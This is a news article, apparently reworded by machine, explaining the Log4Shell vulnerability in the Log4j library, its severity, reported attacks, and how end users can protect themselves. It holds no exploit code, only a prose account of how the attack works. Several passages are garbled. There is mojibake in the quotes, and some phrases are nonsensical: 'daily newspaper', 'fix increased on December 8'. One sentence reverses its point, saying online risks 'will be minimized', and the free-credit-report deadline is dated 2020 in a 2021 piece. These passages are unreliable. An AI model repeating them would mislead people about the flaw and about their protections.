The very serious “Log4Shell” server software flaw that plagued many Minecraft players late last week has, as feared, come to affect the entire Internet. In terms of potential impact, this is one of the most serious computer security vulnerabilities the world has ever known.
“I cannot stress enough the gravity of this threat,” researcher Lotem Finkelstein of the Israeli security company Check Point told ZDNet.
His company has witnessed more than 850,000 attempted attacks on servers since a functional exploit for the vulnerability was published online Thursday (December 9). Antivirus company ESET said the US, UK, Turkey, Germany and the Netherlands were hit the hardest.
The good news: This flaw does not directly affect the average computer user, with the exception of Minecraft players using the Java edition and other PC users who for one reason or another are running a Java environment.
The Java software in question was fully patched on December 13 – an earlier version that mitigates the flaw increased on December 8 – but this is only useful if you are actively running a web server. (Minecraft users just need to update their client software.)
The bad news: Hundreds of thousands, if not millions of web servers are affected and can be hacked with very little effort. Criminals are already using the flaw to install coin mining, botnet and backdoor malware on servers, Microsoft and the Swiss government report.
The flaw was rated 10 out of 10 on the severity scale from the Apache Software Foundation, which maintains the software.
“There is an extremely high, almost certain, chance that every person will interact with software or technology that has this vulnerability hidden somewhere,” John Hammond, researcher at Huntress Labs, told Dark Reading.
Servers managed by Amazon, Apple, Baidu, LinkedIn, QQ, Steam, Tencent, Tesla, and Twitter are or until recently were vulnerable to some extent, although internal backups may prevent further exploitation in each case.
(There are reports that Apple fixed its servers, but we couldn’t find the original source of these reports, and Apple hasn’t responded to our request for confirmation yet.)
We can expect to see a lot of data breaches, ransomware attacks, credit card theft, and maybe even “spam downloads” resulting from this flaw. If something is stored on a web server, it is in danger.
Bitdefender reported on December 13 that it observed online criminals using the Log4Shell flaw to install ransomware and remote access Trojans on a Windows PC, but it was not clear if Java had ever been installed on the affected PCs. We have contacted Bitdefender for clarification.
Much more. We are seeing more than 1,000 exploit attempts per second. And payloads are getting scarier and scarier. Ransomware payloads started in effect within the last 24 hours.December 14, 2021
Log4Shell: “incredibly simple” attack
âThe feat is actually incredibly simple – which makes it very, very scary at the same time,â Bogdan Zdrnja of the nonprofit SANS institute told Vice Motherboard.
All an attacker needs to do is send a small, carefully crafted string of text to a web server. The text could be a message board post, a login attempt, a header string in a web page, or any other type of data that could normally be “saved” by a server with hundreds of thousands of entries. daily newspaper.
The attacker’s text will trick the targeted server to divulge secret information or even send a request for files to another server, like the one the attacker is controlling. In response, the attacker’s server can issue a command to download and run malware on the targeted server, which the targeted server will then execute.
A joker even put the exploit code in the name of his iPhone and got an apple server to respond.
Jen Easterly, director of the US federal government’s Cybersecurity and Infrastructure Security Agency (CISA), called the loophole a “serious risk” and “an urgent challenge for network defenders” in an official notice.
CyberScoop reported that in a call with executives from technology companies on Monday, Easterly said the vulnerability “is one of the most serious I have seen in my entire career, if not the most serious.”
What can you do to defend yourself against Log4Shell?
As the end user, there is not much you can do to repair affected servers unless Java is installed. (Security experts recommended that PC and Mac users turn off Java years ago, and there is little reason to use it these days.)
However, since cybercriminals will exploit this loophole in any way they can, you need to prepare for the worst.
Expect your personal information to be disclosed during data breaches resulting from this vulnerability and that you are at greater risk of identity theft. Expect some of your passwords to be stolen and some of your online accounts to be hacked.
Expect your favorite online retail websites to be hacked into stealing your credit card number, a likelihood made worse by the holiday shopping season. Expect some websites you frequently visit to be corrupted to send you malware.
In other words, the risks you already face online will be minimized. Here is what you need to do.
Register and use a password manager. There is no excuse not to do this, as many of the best password managers are partially or completely free. Use the Password Manager to make sure that all of your passwords are strong and unique. You want to do this today, not tomorrow, so if any of your account passwords are compromised, only one account will be at risk, not all of them.
Set up a free credit freeze to limit the damage caused by potential identity theft. You can also consider one of the best identity theft protection services, but freezing credit is the best preventative measure you can take.
Monitor your credit card accounts for the next few weeks. If you see something wrong, call the phone number on the back of the card and immediately notify the bank that issued the card.
Monitor your credit reports for the next few months. Until April 2020, US residents are allowed to get a free credit report from each of the big three credit bureaus (Equifax, Experian, and TransUnion) every week.
Install some of the best antivirus Software. Windows 10 and 11 already have Microsoft Defender Antivirus integrated, and that’s great, but it doesn’t protect you from web threats from non-Microsoft browsers like Google Chrome or Mozilla Firefox. Microsoft Defender doesn’t help much with Android, Mac, or iOS.
To be fair, all of these recommendations are things you really should be doing anyway. But the fact that half of the Internet is in immediate danger of being horribly hacked makes these safeguards critically important.
Log4Shell fault explained
Very briefly, the Log4Shell vulnerability, cataloged as CVE-2021-44228, resides in open source software called Log4j, a simple logging program for Java applications that is maintained by unpaid volunteers for the Apache Foundation.
This incident has renewed calls for large companies using open source code to hand over money to developers, who work on these tools in their spare time.
If you use software created by others in their spare time and find it useful, pay for it. It shouldn’t be a controversial opinion. https://t.co/XDMFIcTlsWDecember 11, 2021
Logging programs are intended to simply record events, not actively run code. But Log4j does a poor job of “cleaning up” the data it collects. As such, attackers can sneak into malicious code as described above and then instruct the Java server to execute the code.
Because Java is a cross-platform environment designed to “live” on many types of operating systems, servers running Windows, Linux, Unix, or even macOS are also vulnerable.
Speculation that Java libraries such as Log4j could be vulnerable to attack dates back to a 2016 Black Hat presentation. But this particular vulnerability was reported on November 24 to the Apache Foundation by researchers at Chinese internet giant Alibaba, and a fix was quietly developed over the next two weeks and released on December 8.
Mass attacks using the flaw began as soon as the proof of concept code was released early the next morning. Internet security companies Cloudflare and Cisco Talos, however, checked their logs and found evidence of possible exploit attempts as early as December 1.
These “attempts” may have been the result of pinging defenders to see how widespread the vulnerability was. But it could also be that the flaw was privately disclosed to state-sponsored security services, as a different flaw could have been disclosed earlier this year.
Updated with additional information. This story was originally posted on December 13.